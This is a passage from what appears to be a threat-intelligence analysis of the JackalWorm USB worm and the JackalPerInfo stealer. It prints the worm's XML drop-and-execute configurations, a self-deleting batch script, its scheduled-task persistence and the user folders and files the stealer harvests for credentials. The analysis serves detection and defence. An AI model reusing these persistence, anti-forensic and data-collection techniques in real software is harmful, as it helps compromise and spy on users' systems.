hidden directory</li> <li>Performs the actions specified in the configuration files</li> <li>Infects the system with the worm</li> </ol> <p>The configuration files are embedded resources that contain XML data that can be used to instruct the worm to perform some actions:</p> <ul> <li>Drop a program and guarantee its persistence with a scheduled task</li> <li>Drop a program and execute it with the specified arguments</li> <li>Execute an existing program with the specified arguments</li> </ul> <p>A valid configuration file looks like this:</p> <div id="crayon-67b40d946799b638886407" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <Resource type="install" 
interval="15" ext="exe" data="rcdata02" /></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799b638886407-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799b638886407-1"><span class="crayon-h"><</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"install"</span><span class="crayon-h"> </span><span class="crayon-i">interval</span>=<span class="crayon-s">"15"</span><span class="crayon-h"> </span><span class="crayon-i">ext</span>=<span class="crayon-s">"exe"</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"rcdata02"</span><span class="crayon-h"> </span>/<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> In this case, the worm was configured to install the PE file stored in another resource “rcdata02”, save it with the extension .exe and create a scheduled task to run it every 15 minutes.</p> <p>Other valid examples are:</p> <div id="crayon-67b40d946799c204772651" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 
18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <Resource type="process" file="%TMP%\test.exe" args="" data="rcdata02" /></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799c204772651-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799c204772651-1"><span class="crayon-h"><</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"%TMP%\test.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">""</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"rcdata02"</span><span class="crayon-h"> </span>/<span 
class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> Drops the PE file stored in another resource “rcdata02” in “%TEMP%\test.exe” and executes it.</p> <div id="crayon-67b40d946799d721795282" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <Resource type="process" file="%WINDIR%\system32\ping.exe" args="1.1.1.1"/></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" 
data-line="crayon-67b40d946799d721795282-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799d721795282-1"><span class="crayon-h"><</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"%WINDIR%\system32\ping.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">"1.1.1.1"</span>/<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> Executes the program “%WINDIR%\system32\ping.exe” with the argument “1.1.1.1”.</p> <p>In our investigations, we observed only the first example and the malware was configured to install the JackalControl Trojan.</p> <p>The installation procedure selects the malware location in much the same way as the procedure described in the <a href="#Installer_mode">section above</a>. It differs from the other one because it enumerates the subdirectories in CommonAppData only and copies the file using the subdirectory’s names concatenated with another static value, upd.exe.</p> <p>If it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described above.</p> <ul> <li>Google</li> <li>Mozilla</li> <li>Adobe</li> <li>Intel</li> <li>[Random GUID]</li> </ul> <p>The worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically modified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. 
The script is dropped in the local Temp directory with a random name:</p> <div id="crayon-67b40d946799e058679183" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> @echo off @chcp 65001>nul :check @tasklist | findstr /i "%executingFilename%" >nul @if %errorlevel%==0 goto check @del /f /q /a h "%executingPath%" @del /f /q "%Temp%\%randomname%.bat"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" 
data-line="crayon-67b40d946799e058679183-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-2">2</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-4">4</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-6">6</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799e058679183-1"><span class="crayon-sy">@</span><span class="crayon-e">echo </span><span class="crayon-i">off</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-2"><span class="crayon-sy">@</span><span class="crayon-i">chcp</span><span class="crayon-h"> </span><span class="crayon-cn">65001</span><span class="crayon-h">></span><span class="crayon-i">nul</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-3"><span class="crayon-sy">:</span><span class="crayon-i">check</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-4"><span class="crayon-sy">@</span><span class="crayon-i">tasklist</span><span class="crayon-h"> </span><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-i">findstr</span><span class="crayon-h"> </span>/<span class="crayon-i">i</span><span class="crayon-h"> </span><span class="crayon-s">"%executingFilename%"</span><span class="crayon-h"> </span><span class="crayon-h">></span><span class="crayon-i">nul</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-5"><span class="crayon-sy">@</span><span class="crayon-st">if</span><span 
class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">errorlevel</span><span class="crayon-sy">%</span>==<span class="crayon-cn">0</span><span class="crayon-h"> </span><span class="crayon-st">goto</span><span class="crayon-h"> </span><span class="crayon-i">check</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-6"><span class="crayon-sy">@</span><span class="crayon-i">del</span><span class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span>/<span class="crayon-i">a</span><span class="crayon-h"> </span><span class="crayon-i">h</span><span class="crayon-h"> </span><span class="crayon-s">"%executingPath%"</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-7"><span class="crayon-sy">@</span><span class="crayon-i">del</span><span class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span><span class="crayon-s">"%Temp%\%randomname%.bat"</span></div></div></td> </tr> </table> </div> </div><p> The script loops on tasklist until no running process matches the worm’s filename, then deletes the worm copy at %executingPath% and finally the batch file itself. Because the script has a random name and removes itself, evidence of it will typically come from process-creation telemetry (cmd.exe launched with a %Temp%\*.bat argument) rather than from a file on disk.</p> <p>Future removable drives that are attached will be re-infected with JackalWorm.</p> <p>It is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the embedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes, which is much bigger than their actual content:</p> <ul> <li>Rcdata01 – XML config – Size: 67 bytes</li> <li>Rcdata02 – JackalControl Trojan – Size: 27136 bytes</li> </ul> <p>That leaves 166770 bytes of unaccounted-for data. Most of them are part of the legitimate notepad.exe Windows utility, and specifically, the first 0x6A30 bytes were overwritten. 
After the legitimate notepad.exe image, we found also the following XML configurations:</p> <div id="crayon-67b40d94679a0392055782" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <Resource type="scheduler" interval="15" ext="exe" args="" data="notepad" /></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a0392055782-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px 
!important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a0392055782-1"><span class="crayon-h"><</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"scheduler"</span><span class="crayon-h"> </span><span class="crayon-i">interval</span>=<span class="crayon-s">"15"</span><span class="crayon-h"> </span><span class="crayon-i">ext</span>=<span class="crayon-s">"exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">""</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"notepad"</span><span class="crayon-h"> </span>/<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> </p> <div id="crayon-67b40d94679a1101558934" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px 
!important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <Resource type="process" file="cmd.exe" args="/c echo TEST > %USERPROFILE%\Desktop\test.txt" /></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a1101558934-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a1101558934-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a1101558934-1"><span class="crayon-h"><</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"cmd.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">"/c echo TEST > </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a1101558934-2"><span class="crayon-s">%USERPROFILE%\Desktop\test.txt"</span><span class="crayon-h"> </span>/<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> The first XML shows a new type value: ‘scheduler’, which is not specified in the code. 
The second XML shows that this specific resource was used for testing purposes: the attacker was trying to run cmd.exe to write the word “TEST” to a text file on the desktop, %USERPROFILE%\Desktop\test.txt.</p> <h2 id="jackalperinfo">JackalPerInfo</h2> <p>This malware was developed to collect information about the compromised system, as well as a specific set of files that could potentially be used to retrieve stored credentials and the user’s web activities. The attacker named it “perinfo”, a contraction of the program’s main class name PersonalInfoContainer.</p> <p>Its behavior changes according to the number of arguments provided during execution. Specifically, when executed with only one argument, the malware collects a predefined set of information and stores it in a binary file compressed with GZIP; the output filename is the argument itself. When executed with two arguments, the malware treats the first argument as the path of a previously generated binary file and extracts all the information it contains to the directory specified by the second argument.</p> <p>By default, the program should be executed with one argument. 
Once it is executed, the malware starts collecting information about the system using a specific function, GetSysInfo, which collects the following information:</p> <div id="crayon-67b40d94679a2497161524" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Computer name: %s OS version: %S Domain: %S User: %S Local time: %s Interfaces: %Interface Name% DESC: TYPE: MAC: IP: GW: DNS: DHCP: DOMAIN: Remote IP: Current directory: Drives: C:\ Fixed D:\ CDRom ... Applications: %Installed Application1% %Installed Application2% ... 
Processes: %Process Name 1% Desc: %s Name: %s Path: %s %Process Name 2% ...</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-10">10</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-12">12</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-14">14</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-16">16</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-18">18</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-19">19</div><div class="crayon-num crayon-striped-num" 
data-line="crayon-67b40d94679a2497161524-20">20</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-21">21</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-22">22</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-23">23</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-24">24</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-25">25</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-26">26</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-27">27</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-28">28</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-29">29</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-30">30</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-31">31</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-32">32</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-33">33</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a2497161524-1"><span class="crayon-e">Computer </span><span class="crayon-i">name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-2"><span class="crayon-e">OS </span><span class="crayon-i">version</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-3"><span 
class="crayon-i">Domain</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-4"><span class="crayon-i">User</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-5"><span class="crayon-e">Local </span><span class="crayon-i">time</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-6"><span class="crayon-i">Interfaces</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-7"><span class="crayon-ta">%</span><span class="crayon-i">Interface</span><span class="crayon-h"> </span><span class="crayon-i">Name</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-8"> </div><div class="crayon-line" id="crayon-67b40d94679a2497161524-9"><span class="crayon-h"> </span><span class="crayon-i">DESC</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-10"><span class="crayon-h"> </span><span class="crayon-i">TYPE</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-11"><span class="crayon-h"> </span><span class="crayon-i">MAC</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-12"><span class="crayon-h"> </span><span class="crayon-i">IP</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-13"><span class="crayon-h"> </span><span class="crayon-i">GW</span><span 
class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-14"><span class="crayon-h"> </span><span class="crayon-i">DNS</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-15"><span class="crayon-h"> </span><span class="crayon-i">DHCP</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-16"><span class="crayon-h"> </span><span class="crayon-i">DOMAIN</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-17"><span class="crayon-e">Remote </span><span class="crayon-i">IP</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-18"><span class="crayon-e">Current </span><span class="crayon-i">directory</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-19"><span class="crayon-i">Drives</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-20"><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-h"> </span><span class="crayon-i">Fixed</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-21"><span class="crayon-h"> </span><span class="crayon-i">D</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-h"> </span><span class="crayon-i">CDRom</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-22"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-23"><span class="crayon-i">Applications</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" 
id="crayon-67b40d94679a2497161524-24"><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-e">Installed </span><span class="crayon-i">Application1</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-25"><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-e">Installed </span><span class="crayon-i">Application2</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-26"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-27"><span class="crayon-i">Processes</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-28"><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-e">Process </span><span class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-29"><span class="crayon-h"> </span><span class="crayon-i">Desc</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-30"><span class="crayon-h"> </span><span class="crayon-i">Name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-31"><span class="crayon-h"> </span><span class="crayon-i">Path</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-32"><span 
class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-e">Process </span><span class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-cn">2</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-33"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div></div></td> </tr> </table> </div> </div><p> This specific function was also observed in the first JackalControl variants, but was removed from newer variants.</p> <p>The malware continues its operation by enumerating the logical drives on the system and, for each one, enumerating the files in its root path. The collected info includes the last write time, the filename, and the file size.</p> <p>It then enumerates the Users directory on the system drive, usually C:\Users\. For each user, it enumerates the content of the following directories:</p> <ul> <li>Desktop</li> <li>Documents</li> <li>Downloads</li> <li>AppData\Roaming\Microsoft\Windows\Recent</li> </ul> <p>It also tries to acquire the following files:</p> <div id="crayon-67b40d94679a3896987430" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" 